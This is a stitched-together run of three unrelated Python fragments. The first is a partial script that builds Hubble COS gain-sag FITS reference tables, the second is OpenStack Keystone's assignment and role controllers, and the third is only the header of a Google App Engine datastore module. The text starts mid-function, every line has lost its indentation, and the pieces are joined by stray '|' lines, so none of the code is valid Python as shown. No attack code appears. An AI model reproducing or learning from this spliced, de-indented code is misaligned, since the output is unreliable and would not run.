hdu_out[0].header['COSCOORD'] = 'USER'
hdu_out[0].header['VCALCOS'] = '2.0'
hdu_out[0].header['USEAFTER'] = 'May 11 2009 00:00:00'
today_string = date_string(datetime.now())
hdu_out[0].header['PEDIGREE'] = 'INFLIGHT 25/05/2009 %s'%(today_string)
hdu_out[0].header['FILETYPE'] = 'GAIN SAG REFERENCE TABLE'
descrip_string = 'Gives locations of gain-sag regions as of %s'%( str(datetime.now().date() ))
while len(descrip_string) < 67:
descrip_string += '-'
hdu_out[0].header['DESCRIP'] = descrip_string
hdu_out[0].header['COMMENT'] = "= 'This file was created by J. Ely'"
hdu_out[0].header.add_history('Flagged region source files can be found here:')
for item in input_list:
hdu_out[0].header.add_history('%s'%(item))
hdu_out[0].header.add_history('')
hdu_out[0].header.add_history('Flagged regions in higher voltages have been backwards populated')
hdu_out[0].header.add_history('to all lower HV levels for the same segment.')
hdu_out[0].header.add_history('')
hdu_out[0].header.add_history('A region will be flagged as bad when the detected')
hdu_out[0].header.add_history('flux is found to drop by 5%. This happens when')
hdu_out[0].header.add_history('the measured modal gain of a region falls to ')
hdu_out[0].header.add_history('%d given current lower pulse height filtering.'%(MODAL_GAIN_LIMIT) )
possible_hv_strings = ['000','100'] + list(map(str,list(range(142,179))))
for segment_string in [FUVA_string,FUVB_string]:
for hv_level_st in possible_hv_strings:
hv_level = int( hv_level_st )
if segment_string == FUVA_string:
segment = 'FUVA'
HVLEVEL_string ='HVLEVELA'
elif segment_string == FUVB_string:
segment = 'FUVB'
HVLEVEL_string = 'HVLEVELB'
infile = os.path.join( MONITOR_DIR, "flagged_bad_%s_%s.txt"%(segment_string,hv_level_st) )
date = []
lx = []
dx = []
ly = []
dy = []
dq = []
if os.path.exists( infile ):
txt = open(infile,'rU')
txt.readline()
txt.readline()
for line in txt.readlines():
line = line.strip().split()
for i in range(len(line)):
line[i] = float(line[i])
if len(line) != 5:
print('Skipping')
continue
lx.append( line[0] )
dx.append( line[1] )
ly.append( line[2] )
dy.append( line[3] )
date.append( line[4] )
dq.append( 8192 )
if not len(lx):
#Extension tables cannot have 0 entries, a
#region of 0 extent centered on (0,0) is
#sufficient to prevent CalCOS crash.
date.append( 0 )
lx.append( 0 )
ly.append( 0 )
dx.append( 0 )
dy.append( 0 )
dq.append( 8192 )
tab = gsagtab_extension( date,lx,dx,ly,dy,dq,hv_level,HVLEVEL_string,segment)
hdu_out.append(tab)
hdu_out.writeto(out_fits,clobber=True)
print(('WROTE: GSAGTAB to %s'%(out_fits)))
return out_fits
#------------------------------------------------------------
def in_boundary(segment, ly, dy):
boundary = {'FUVA': 493, 'FUVB': 557}
padding = 4
boundary_pix = set(np.arange(boundary[segment]-padding,
boundary[segment]+padding+1))
affected_pix = set(np.arange(ly, ly+dy+1))
if affected_pix.intersection(boundary_pix):
return True
return False
#------------------------------------------------------------
def make_gsagtab_db(out_dir, blue=False):
"""Create GSAGTAB from flagged locations.
Grabs txt files of flagged bad regions from MONITOR_DIR
and combines them into a gsagtab.
Parameters
----------
None
Returns
-------
None
Products
--------
new_gsagtab.fits
"""
out_fits = os.path.join(out_dir, 'gsag_%s.fits'%(TIMESTAMP))
#Populates regions found in HV == X, Segment Y, to any
#extensions of lower HV for same segment.
hdu_out=fits.HDUList(fits.PrimaryHDU())
date_time = str(datetime.now())
date_time = date_time.split()[0]+'T'+date_time.split()[1]
hdu_out[0].header['DATE'] = (date_time, 'Creation UTC (CCCC-MM-DD) date')
hdu_out[0].header['TELESCOP'] = 'HST'
hdu_out[0].header['INSTRUME'] = 'COS'
hdu_out[0].header['DETECTOR'] = 'FUV'
hdu_out[0].header['COSCOORD'] = 'USER'
hdu_out[0].header['VCALCOS'] = '2.0'
hdu_out[0].header['USEAFTER'] = 'May 11 2009 00:00:00'
hdu_out[0].header['CENWAVE'] = 'N/A'
today_string = date_string(datetime.now())
hdu_out[0].header['PEDIGREE'] = 'INFLIGHT 25/05/2009 %s'%(today_string)
hdu_out[0].header['FILETYPE'] = 'GAIN SAG REFERENCE TABLE'
descrip_string = 'Gives locations of gain-sag regions as of %s'%( str(datetime.now().date() ))
while len(descrip_string) < 67:
descrip_string += '-'
hdu_out[0].header['DESCRIP'] = descrip_string
hdu_out[0].header['COMMENT'] = ("= 'This file was created by J. Ely'")
hdu_out[0].header.add_history('Flagged regions in higher voltages have been backwards populated')
hdu_out[0].header.add_history('to all lower HV levels for the same segment.')
hdu_out[0].header.add_history('')
hdu_out[0].header.add_history('A region will be flagged as bad when the detected')
hdu_out[0].header.add_history('flux is found to drop by 5%. This happens when')
hdu_out[0].header.add_history('the measured modal gain of a region falls to ')
hdu_out[0].header.add_history('%d given current lower pulse height filtering.'%(MODAL_GAIN_LIMIT) )
possible_hv_strings = ['000', '100'] + list(map(str, list(range(142, 179))))
SETTINGS = open_settings()
Session, engine = load_connection(SETTINGS['connection_string'])
connection = engine.connect()
results = connection.execute("""SELECT DISTINCT segment FROM gain WHERE concat(segment,x,y) IS NOT NULL""")
segments = [item[0] for item in results]
for seg in segments:
hvlevel_string = 'HVLEVEL' + seg[-1].upper()
for hv_level in possible_hv_strings:
date = []
lx = []
dx = []
ly = []
dy = []
dq = []
hv_level = int(hv_level)
results = connection.execute("""SELECT DISTINCT x,y
FROM flagged WHERE segment='%s'
and dethv>='%s'
and concat(x,y) IS NOT NULL
"""
%(seg, hv_level)
)
coords = [(item[0], item[1]) for item in results]
for x, y in coords:
results = connection.execute("""SELECT MJD
FROM flagged
WHERE segment='%s'
AND x='%s'
AND y='%s'
AND dethv>='%s'
AND concat(x,y) IS NOT NULL
"""
%(seg, x, y, hv_level)
)
flagged_dates = [item[0] for item in results]
if len(flagged_dates):
bad_date = min(flagged_dates)
else:
continue
if blue and in_boundary(seg, y*Y_BINNING, Y_BINNING):
logger.debug("Excluding for blue modes: {} {} {}".format(seg, y*Y_BINNING, Y_BINNING))
continue
lx.append(x*X_BINNING)
dx.append(X_BINNING)
ly.append(y*Y_BINNING)
dy.append(Y_BINNING)
date.append(bad_date)
dq.append(8192)
if not len(lx):
#Extension tables cannot have 0 entries, a
#region of 0 extent centered on (0,0) is
#sufficient to prevent CalCOS crash.
lx.append(0)
ly.append(0)
dx.append(0)
dy.append(0)
date.append(0)
dq.append(8192)
logger.debug('found {} bad regions'.format(len(date)))
tab = gsagtab_extension(date, lx, dx, ly, dy, dq, hv_level, hvlevel_string, seg)
hdu_out.append(tab)
if blue:
out_fits = out_fits.replace('.fits', '_blue.fits')
hdu_out[0].header['CENWAVE'] = 'BETWEEN 1055 1097'
descrip_string = 'Blue-mode gain-sag regions as of %s'%(str(datetime.now().date()))
while len(descrip_string) < 67:
descrip_string += '-'
hdu_out[0].header['DESCRIP'] = descrip_string
hdu_out.writeto(out_fits, clobber=True)
logger.info('WROTE: GSAGTAB to %s'%(out_fits))
return out_fits
#------------------------------------------------------------
def get_cdbs_gsagtab():
"""Retrieve most recently delivered GSAGTAB from CDBS
for comparison with the one just made.
"""
gsag_tables = glob.glob(os.path.join(os.environ['lref'], '*gsag.fits'))
creation_dates = np.array([fits.getval(item, 'DATE') for item in gsag_tables])
current_gsagtab = gsag_tables[creation_dates.argmax()]
return current_gsagtab
#------------------------------------------------------------
|
|
# Copyright 2013 Metacloud, Inc.
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Workflow Logic the Assignment service."""
import copy
import uuid
import six
from six.moves import urllib
from keystone.common import controller
from keystone.common import dependency
from keystone import config
from keystone import exception
from keystone.i18n import _
from keystone.openstack.common import log
CONF = config.CONF
LOG = log.getLogger(__name__)
@dependency.requires('assignment_api', 'identity_api', 'token_api')
class Tenant(controller.V2Controller):
@controller.v2_deprecated
def get_all_projects(self, context, **kw):
"""Gets a list of all tenants for an admin user."""
if 'name' in context['query_string']:
return self.get_project_by_name(
context, context['query_string'].get('name'))
self.assert_admin(context)
tenant_refs = self.assignment_api.list_projects_in_domain(
CONF.identity.default_domain_id)
for tenant_ref in tenant_refs:
tenant_ref = self.filter_domain_id(tenant_ref)
params = {
'limit': context['query_string'].get('limit'),
'marker': context['query_string'].get('marker'),
}
return self._format_project_list(tenant_refs, **params)
@controller.v2_deprecated
def get_projects_for_token(self, context, **kw):
"""Get valid tenants for token based on token used to authenticate.
Pulls the token from the context, validates it and gets the valid
tenants for the user in the token.
Doesn't care about token scopedness.
"""
try:
token_ref = self.token_api.get_token(context['token_id'])
except exception.NotFound as e:
LOG.warning(_('Authentication failed: %s'), e)
raise exception.Unauthorized(e)
user_ref = token_ref['user']
tenant_refs = (
self.assignment_api.list_projects_for_user(user_ref['id']))
tenant_refs = [self.filter_domain_id(ref) for ref in tenant_refs
if ref['domain_id'] == CONF.identity.default_domain_id]
params = {
'limit': context['query_string'].get('limit'),
'marker': context['query_string'].get('marker'),
}
return self._format_project_list(tenant_refs, **params)
@controller.v2_deprecated
def get_project(self, context, tenant_id):
# TODO(termie): this stuff should probably be moved to middleware
self.assert_admin(context)
ref = self.assignment_api.get_project(tenant_id)
return {'tenant': self.filter_domain_id(ref)}
@controller.v2_deprecated
def get_project_by_name(self, context, tenant_name):
self.assert_admin(context)
ref = self.assignment_api.get_project_by_name(
tenant_name, CONF.identity.default_domain_id)
return {'tenant': self.filter_domain_id(ref)}
# CRUD Extension
@controller.v2_deprecated
def create_project(self, context, tenant):
tenant_ref = self._normalize_dict(tenant)
if 'name' not in tenant_ref or not tenant_ref['name']:
msg = _('Name field is required and cannot be empty')
raise exception.ValidationError(message=msg)
self.assert_admin(context)
tenant_ref['id'] = tenant_ref.get('id', uuid.uuid4().hex)
tenant = self.assignment_api.create_project(
tenant_ref['id'],
self._normalize_domain_id(context, tenant_ref))
return {'tenant': self.filter_domain_id(tenant)}
@controller.v2_deprecated
def update_project(self, context, tenant_id, tenant):
self.assert_admin(context)
# Remove domain_id if specified - a v2 api caller should not
# be specifying that
clean_tenant = tenant.copy()
clean_tenant.pop('domain_id', None)
tenant_ref = self.assignment_api.update_project(
tenant_id, clean_tenant)
return {'tenant': tenant_ref}
@controller.v2_deprecated
def delete_project(self, context, tenant_id):
self.assert_admin(context)
self.assignment_api.delete_project(tenant_id)
@controller.v2_deprecated
def get_project_users(self, context, tenant_id, **kw):
self.assert_admin(context)
user_refs = []
user_ids = self.assignment_api.list_user_ids_for_project(tenant_id)
for user_id in user_ids:
try:
user_ref = self.identity_api.get_user(user_id)
except exception.UserNotFound:
# Log that user is missing and continue on.
message = ("User %(user_id)s in project %(project_id)s "
"doesn't exist.")
LOG.debug(message,
{'user_id': user_id, 'project_id': tenant_id})
else:
user_refs.append(self.v3_to_v2_user(user_ref))
return {'users': user_refs}
def _format_project_list(self, tenant_refs, **kwargs):
marker = kwargs.get('marker')
first_index = 0
if marker is not None:
for (marker_index, tenant) in enumerate(tenant_refs):
if tenant['id'] == marker:
# we start pagination after the marker
first_index = marker_index + 1
break
else:
msg = _('Marker could not be found')
raise exception.ValidationError(message=msg)
limit = kwargs.get('limit')
last_index = None
if limit is not None:
try:
limit = int(limit)
if limit < 0:
raise AssertionError()
except (ValueError, AssertionError):
msg = _('Invalid limit value')
raise exception.ValidationError(message=msg)
last_index = first_index + limit
tenant_refs = tenant_refs[first_index:last_index]
for x in tenant_refs:
if 'enabled' not in x:
x['enabled'] = True
o = {'tenants': tenant_refs,
'tenants_links': []}
return o
@dependency.requires('assignment_api')
class Role(controller.V2Controller):
# COMPAT(essex-3)
@controller.v2_deprecated
def get_user_roles(self, context, user_id, tenant_id=None):
"""Get the roles for a user and tenant pair.
Since we're trying to ignore the idea of user-only roles we're
not implementing them in hopes that the idea will die off.
"""
self.assert_admin(context)
if tenant_id is None:
raise exception.NotImplemented(message='User roles not supported: '
'tenant ID required')
roles = self.assignment_api.get_roles_for_user_and_project(
user_id, tenant_id)
return {'roles': [self.assignment_api.get_role(x)
for x in roles]}
# CRUD extension
@controller.v2_deprecated
def get_role(self, context, role_id):
self.assert_admin(context)
return {'role': self.assignment_api.get_role(role_id)}
@controller.v2_deprecated
def create_role(self, context, role):
role = self._normalize_dict(role)
self.assert_admin(context)
if 'name' not in role or not role['name']:
msg = _('Name field is required and cannot be empty')
raise exception.ValidationError(message=msg)
role_id = uuid.uuid4().hex
role['id'] = role_id
role_ref = self.assignment_api.create_role(role_id, role)
return {'role': role_ref}
@controller.v2_deprecated
def delete_role(self, context, role_id):
self.assert_admin(context)
self.assignment_api.delete_role(role_id)
@controller.v2_deprecated
def get_roles(self, context):
self.assert_admin(context)
return {'roles': self.assignment_api.list_roles()}
@controller.v2_deprecated
def add_role_to_user(self, context, user_id, role_id, tenant_id=None):
"""Add a role to a user and tenant pair.
Since we're trying to ignore the idea of user-only roles we're
not implementing them in hopes that the idea will die off.
"""
self.assert_admin(context)
if tenant_id is None:
raise exception.NotImplemented(message='User roles not supported: '
'tenant_id required')
self.assignment_api.add_role_to_user_and_project(
user_id, tenant_id, role_id)
role_ref = self.assignment_api.get_role(role_id)
return {'role': role_ref}
@controller.v2_deprecated
def remove_role_from_user(self, context, user_id, role_id, tenant_id=None):
"""Remove a role from a user and tenant pair.
Since we're trying to ignore the idea of user-only roles we're
not implementing them in hopes that the idea will die off.
"""
self.assert_admin(context)
if tenant_id is None:
raise exception.NotImplemented(message='User roles not supported: '
'tenant_id required')
# This still has the weird legacy semantics that adding a role to
# a user also adds them to a tenant, so we must follow up on that
self.assignment_api.remove_role_from_user_and_project(
user_id, tenant_id, role_id)
# COMPAT(diablo): CRUD extension
@controller.v2_deprecated
def get_role_refs(self, context, user_id):
"""Ultimate hack to get around having to make role_refs first-class.
This will basically iterate over the various roles the user has in
all tenants the user is a member of and create fake role_refs where
the id encodes the user-tenant-role information so we can look
up the appropriate data when we need to delete them.
"""
self.assert_admin(context)
tenants = self.assignment_api.list_projects_for_user(user_id)
o = []
for tenant in tenants:
# As a v2 call, we should limit the response to those projects in
# the default domain.
if tenant['domain_id'] != CONF.identity.default_domain_id:
continue
role_ids = self.assignment_api.get_roles_for_user_and_project(
user_id, tenant['id'])
for role_id in role_ids:
ref = {'roleId': role_id,
'tenantId': tenant['id'],
'userId': user_id}
ref['id'] = urllib.parse.urlencode(ref)
o.append(ref)
return {'roles': o}
# COMPAT(diablo): CRUD extension
@controller.v2_deprecated
def create_role_ref(self, context, user_id, role):
"""This is actually used for adding a user to a tenant.
In the legacy data model adding a user to a tenant required setting
a role.
"""
self.assert_admin(context)
# TODO(termie): for now we're ignoring the actual role
tenant_id = role.get('tenantId')
role_id = role.get('roleId')
self.assignment_api.add_role_to_user_and_project(
user_id, tenant_id, role_id)
role_ref = self.assignment_api.get_role(role_id)
return {'role': role_ref}
# COMPAT(diablo): CRUD extension
@controller.v2_deprecated
def delete_role_ref(self, context, user_id, role_ref_id):
"""This is actually used for deleting a user from a tenant.
In the legacy data model removing a user from a tenant required
deleting a role.
To emulate this, we encode the tenant and role in the role_ref_id,
and if this happens to be the last role for the user-tenant pair,
we remove the user from the tenant.
"""
self.assert_admin(context)
# TODO(termie): for now we're ignoring the actual role
role_ref_ref = urllib.parse.parse_qs(role_ref_id)
tenant_id = role_ref_ref.get('tenantId')[0]
role_id = role_ref_ref.get('roleId')[0]
self.assignment_api.remove_role_from_user_and_project(
user_id, tenant_id, role_id)
@dependency.requires('assignment_api')
class DomainV3(controller.V3Controller):
collection_name = 'domains'
member_name = 'domain'
def __init__(self):
super(DomainV3, self).__init__()
self.get_member_from_driver = self.assignment_api.get_domain
@controller.protected()
def create_domain(self, context, domain):
self._require_attribute(domain, 'name')
ref = self._assign_unique_id(self._normalize_dict(domain))
ref = self.assignment_api.create_domain(ref['id'], ref)
return DomainV3.wrap_member(context, ref)
@controller.filterprotected('enabled', 'name')
def list_domains(self, context, filters):
hints = DomainV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_domains(hints=hints)
return DomainV3.wrap_collection(context, refs, hints=hints)
@controller.protected()
def get_domain(self, context, domain_id):
ref = self.assignment_api.get_domain(domain_id)
return DomainV3.wrap_member(context, ref)
@controller.protected()
def update_domain(self, context, domain_id, domain):
self._require_matching_id(domain_id, domain)
ref = self.assignment_api.update_domain(domain_id, domain)
return DomainV3.wrap_member(context, ref)
@controller.protected()
def delete_domain(self, context, domain_id):
return self.assignment_api.delete_domain(domain_id)
@dependency.requires('assignment_api')
class ProjectV3(controller.V3Controller):
collection_name = 'projects'
member_name = 'project'
def __init__(self):
super(ProjectV3, self).__init__()
self.get_member_from_driver = self.assignment_api.get_project
@controller.protected()
def create_project(self, context, project):
self._require_attribute(project, 'name')
ref = self._assign_unique_id(self._normalize_dict(project))
ref = self._normalize_domain_id(context, ref)
ref = self.assignment_api.create_project(ref['id'], ref)
return ProjectV3.wrap_member(context, ref)
@controller.filterprotected('domain_id', 'enabled', 'name')
def list_projects(self, context, filters):
hints = ProjectV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_projects(hints=hints)
return ProjectV3.wrap_collection(context, refs, hints=hints)
@controller.filterprotected('enabled', 'name')
def list_user_projects(self, context, filters, user_id):
hints = ProjectV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_projects_for_user(user_id,
hints=hints)
return ProjectV3.wrap_collection(context, refs, hints=hints)
@controller.protected()
def get_project(self, context, project_id):
ref = self.assignment_api.get_project(project_id)
return ProjectV3.wrap_member(context, ref)
@controller.protected()
def update_project(self, context, project_id, project):
self._require_matching_id(project_id, project)
self._require_matching_domain_id(
project_id, project, self.assignment_api.get_project)
ref = self.assignment_api.update_project(project_id, project)
return ProjectV3.wrap_member(context, ref)
@controller.protected()
def delete_project(self, context, project_id):
return self.assignment_api.delete_project(project_id)
@dependency.requires('assignment_api', 'identity_api')
class RoleV3(controller.V3Controller):
collection_name = 'roles'
member_name = 'role'
def __init__(self):
super(RoleV3, self).__init__()
self.get_member_from_driver = self.assignment_api.get_role
@controller.protected()
def create_role(self, context, role):
self._require_attribute(role, 'name')
ref = self._assign_unique_id(self._normalize_dict(role))
ref = self.assignment_api.create_role(ref['id'], ref)
return RoleV3.wrap_member(context, ref)
@controller.filterprotected('name')
def list_roles(self, context, filters):
hints = RoleV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_roles(
hints=hints)
return RoleV3.wrap_collection(context, refs, hints=hints)
@controller.protected()
def get_role(self, context, role_id):
ref = self.assignment_api.get_role(role_id)
return RoleV3.wrap_member(context, ref)
@controller.protected()
def update_role(self, context, role_id, role):
self._require_matching_id(role_id, role)
ref = self.assignment_api.update_role(role_id, role)
return RoleV3.wrap_member(context, ref)
@controller.protected()
def delete_role(self, context, role_id):
self.assignment_api.delete_role(role_id)
def _require_domain_xor_project(self, domain_id, project_id):
if (domain_id and project_id) or (not domain_id and not project_id):
msg = _('Specify a domain or project, not both')
raise exception.ValidationError(msg)
def _require_user_xor_group(self, user_id, group_id):
if (user_id and group_id) or (not user_id and not group_id):
msg = _('Specify a user or group, not both')
raise exception.ValidationError(msg)
def _check_if_inherited(self, context):
return (CONF.os_inherit.enabled and
context['path'].startswith('/OS-INHERIT') and
context['path'].endswith('/inherited_to_projects'))
def _check_grant_protection(self, context, protection, role_id=None,
user_id=None, group_id=None,
domain_id=None, project_id=None):
"""Check protection for role grant APIs.
The policy rule might want to inspect attributes of any of the entities
involved in the grant. So we get these and pass them to the
check_protection() handler in the controller.
"""
ref = {}
if role_id:
ref['role'] = self.assignment_api.get_role(role_id)
if user_id:
ref['user'] = self.identity_api.get_user(user_id)
else:
ref['group'] = self.identity_api.get_group(group_id)
if domain_id:
ref['domain'] = self.assignment_api.get_domain(domain_id)
else:
ref['project'] = self.assignment_api.get_project(project_id)
self.check_protection(context, protection, ref)
@controller.protected(callback=_check_grant_protection)
def create_grant(self, context, role_id, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Grants a role to a user or group on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
self.assignment_api.create_grant(
role_id, user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
@controller.protected(callback=_check_grant_protection)
def list_grants(self, context, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Lists roles granted to user/group on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
refs = self.assignment_api.list_grants(
user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
return RoleV3.wrap_collection(context, refs)
@controller.protected(callback=_check_grant_protection)
def check_grant(self, context, role_id, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Checks if a role has been granted on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
self.assignment_api.get_grant(
role_id, user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
@controller.protected(callback=_check_grant_protection)
def revoke_grant(self, context, role_id, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Revokes a role from user/group on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
self.assignment_api.delete_grant(
role_id, user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
@dependency.requires('assignment_api', 'identity_api')
class RoleAssignmentV3(controller.V3Controller):
# TODO(henry-nash): The current implementation does not provide a full
# first class entity for role-assignment. There is no role_assignment_id
# and only the list_role_assignment call is supported. Further, since it
# is not a first class entity, the links for the individual entities
# reference the individual role grant APIs.
collection_name = 'role_assignments'
member_name = 'role_assignment'
@classmethod
def wrap_member(cls, context, ref):
# NOTE(henry-nash): Since we are not yet a true collection, we override
# the wrapper as have already included the links in the entities
pass
def _format_entity(self, context, entity):
"""Format an assignment entity for API response.
The driver layer returns entities as dicts containing the ids of the
actor (e.g. user or group), target (e.g. domain or project) and role.
If it is an inherited role, then this is also indicated. Examples:
{'user_id': user_id,
'project_id': domain_id,
'role_id': role_id}
or, for an inherited role:
{'user_id': user_id,
'domain_id': domain_id,
'role_id': role_id,
'inherited_to_projects': true}
This function maps this into the format to be returned via the API,
e.g. for the second example above:
{
'user': {
{'id': user_id}
},
'scope': {
'domain': {
{'id': domain_id}
},
'OS-INHERIT:inherited_to': 'projects
},
'role': {
{'id': role_id}
},
'links': {
'assignment': '/domains/domain_id/users/user_id/roles/'
'role_id/inherited_to_projects'
}
}
"""
formatted_entity = {}
suffix = ""
if 'user_id' in entity:
formatted_entity['user'] = {'id': entity['user_id']}
actor_link = 'users/%s' % entity['user_id']
if 'group_id' in entity:
formatted_entity['group'] = {'id': entity['group_id']}
actor_link = 'groups/%s' % entity['group_id']
if 'role_id' in entity:
formatted_entity['role'] = {'id': entity['role_id']}
if 'project_id' in entity:
formatted_entity['scope'] = (
{'project': {'id': entity['project_id']}})
target_link = '/projects/%s' % entity['project_id']
if 'domain_id' in entity:
formatted_entity['scope'] = (
{'domain': {'id': entity['domain_id']}})
if 'inherited_to_projects' in entity:
formatted_entity['scope']['OS-INHERIT:inherited_to'] = (
'projects')
target_link = '/OS-INHERIT/domains/%s' % entity['domain_id']
suffix = '/inherited_to_projects'
else:
target_link = '/domains/%s' % entity['domain_id']
formatted_entity.setdefault('links', {})
path = '%(target)s/%(actor)s/roles/%(role)s%(suffix)s' % {
'target': target_link,
'actor': actor_link,
'role': entity['role_id'],
'suffix': suffix}
formatted_entity['links']['assignment'] = self.base_url(context, path)
return formatted_entity
def _expand_indirect_assignments(self, context, refs):
"""Processes entity list into all-direct assignments.
For any group role assignments in the list, create a role assignment
entity for each member of that group, and then remove the group
assignment entity itself from the list.
If the OS-INHERIT extension is enabled, then honor any inherited
roles on the domain by creating the equivalent on all projects
owned by the domain.
For any new entity created by virtue of group membership, add in an
additional link to that membership.
"""
def _get_group_members(ref):
"""Get a list of group members.
Get the list of group members. If this fails with
GroupNotFound, then log this as a warning, but allow
overall processing to continue.
"""
try:
members = self.identity_api.list_users_in_group(
ref['group']['id'])
except exception.GroupNotFound:
members = []
# The group is missing, which should not happen since
# group deletion should remove any related assignments, so
# log a warning
if 'domain' in ref:
target = 'Domain: %s' % ref['domain'].get('domain_id')
elif 'project' in ref:
target = 'Project: %s' % ref['project'].get('project_id')
else:
# Should always be a domain or project, but since to get
# here things have gone astray, let's be cautious.
target = 'Unknown'
LOG.warning(
_('Group %(group)s not found for role-assignment - '
'%(target)s with Role: %(role)s'), {
'group': ref['group_id'], 'target': target,
'role': ref.get('role_id')})
return members
def _build_user_assignment_equivalent_of_group(
user, group_id, template):
"""Create a user assignment equivalent to the group one.
The template has had the 'group' entity removed, so
substitute a 'user' one. The 'assignment' link stays as it is,
referring to the group assignment that led to this role.
A 'membership' link is added that refers to this particular
user's membership of this group.
"""
user_entry = copy.deepcopy(template)
user_entry['user'] = {'id': user['id']}
user_entry['links']['membership'] = (
self.base_url(context, '/groups/%s/users/%s' %
(group_id, user['id'])))
return user_entry
def _build_project_equivalent_of_user_domain_role(
project_id, domain_id, template):
"""Create a user project assignment equivalent to the domain one.
The template has had the 'domain' entity removed, so
substitute a 'project' one, modifying the 'assignment' link
to match.
"""
project_entry = copy.deepcopy(template)
project_entry['scope']['project'] = {'id': project_id}
project_entry['links']['assignment'] = (
self.base_url(
context,
'/OS-INHERIT/domains/%s/users/%s/roles/%s'
'/inherited_to_projects' % (
domain_id, project_entry['user']['id'],
project_entry['role']['id'])))
return project_entry
def _build_project_equivalent_of_group_domain_role(
user_id, group_id, project_id, domain_id, template):
"""Create a user project equivalent to the domain group one.
The template has had the 'domain' and 'group' entities removed, so
substitute a 'user-project' one, modifying the 'assignment' link
to match.
"""
project_entry = copy.deepcopy(template)
project_entry['user'] = {'id': user_id}
project_entry['scope']['project'] = {'id': project_id}
project_entry['links']['assignment'] = (
self.base_url(context,
'/OS-INHERIT/domains/%s/groups/%s/roles/%s'
'/inherited_to_projects' % (
domain_id, group_id,
project_entry['role']['id'])))
project_entry['links']['membership'] = (
self.base_url(context, '/groups/%s/users/%s' %
(group_id, user_id)))
return project_entry
# Scan the list of entities for any assignments that need to be
# expanded.
#
# If the OS-INERIT extension is enabled, the refs lists may
# contain roles to be inherited from domain to project, so expand
# these as well into project equivalents
#
# For any regular group entries, expand these into user entries based
# on membership of that group.
#
# Due to the potentially large expansions, rather than modify the
# list we are enumerating, we build a new one as we go.
#
new_refs = []
for r in refs:
if 'OS-INHERIT:inherited_to' in r['scope']:
# It's an inherited domain role - so get the list of projects
# owned by this domain. A domain scope is guaranteed since we
# checked this when we built the refs list
project_ids = (
[x['id'] for x in
self.assignment_api.list_projects_in_domain(
r['scope']['domain']['id'])])
base_entry = copy.deepcopy(r)
domain_id = base_entry['scope']['domain']['id']
base_entry['scope'].pop('domain')
# For each project, create an equivalent role assignment
for p in project_ids:
# If it's a group assignment, then create equivalent user
# roles based on membership of the group
if 'group' in base_entry:
members = _get_group_members(base_entry)
sub_entry = copy.deepcopy(base_entry)
group_id = sub_entry['group']['id']
sub_entry.pop('group')
for m in members:
new_entry = (
_build_project_equivalent_of_group_domain_role(
m['id'], group_id, p,
domain_id, sub_entry))
new_refs.append(new_entry)
else:
new_entry = (
_build_project_equivalent_of_user_domain_role(
p, domain_id, base_entry))
new_refs.append(new_entry)
elif 'group' in r:
# It's a non-inherited group role assignment, so get the list
# of members.
members = _get_group_members(r)
# Now replace that group role assignment entry with an
# equivalent user role assignment for each of the group members
base_entry = copy.deepcopy(r)
group_id = base_entry['group']['id']
base_entry.pop('group')
for m in members:
user_entry = _build_user_assignment_equivalent_of_group(
m, group_id, base_entry)
new_refs.append(user_entry)
else:
new_refs.append(r)
return new_refs
def _query_filter_is_true(self, filter_value):
"""Determine if bool query param is 'True'.
We treat this the same way as we do for policy
enforcement:
{bool_param}=0 is treated as False
Any other value is considered to be equivalent to
True, including the absence of a value
"""
if (isinstance(filter_value, six.string_types) and
filter_value == '0'):
val = False
else:
val = True
return val
def _filter_inherited(self, entry):
if ('inherited_to_projects' in entry and
not CONF.os_inherit.enabled):
return False
else:
return True
@controller.filterprotected('group.id', 'role.id',
'scope.domain.id', 'scope.project.id',
'scope.OS-INHERIT:inherited_to', 'user.id')
def list_role_assignments(self, context, filters):
# TODO(henry-nash): This implementation uses the standard filtering
# in the V3.wrap_collection. Given the large number of individual
# assignments, this is pretty inefficient. An alternative would be
# to pass the filters into the driver call, so that the list size is
# kept a minimum.
hints = self.build_driver_hints(context, filters)
refs = self.assignment_api.list_role_assignments()
formatted_refs = (
[self._format_entity(context, x) for x in refs
if self._filter_inherited(x)])
if ('effective' in context['query_string'] and
self._query_filter_is_true(
context['query_string']['effective'])):
formatted_refs = self._expand_indirect_assignments(context,
formatted_refs)
return self.wrap_collection(context, formatted_refs, hints=hints)
@controller.protected()
def get_role_assignment(self, context):
raise exception.NotImplemented()
@controller.protected()
def update_role_assignment(self, context):
raise exception.NotImplemented()
@controller.protected()
def delete_role_assignment(self, context):
raise exception.NotImplemented()
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of the datastore_v4 API that forwards to the v3 service."""
from google.appengine.datastore import entity_pb
from google.appengine.api import api_base_pb
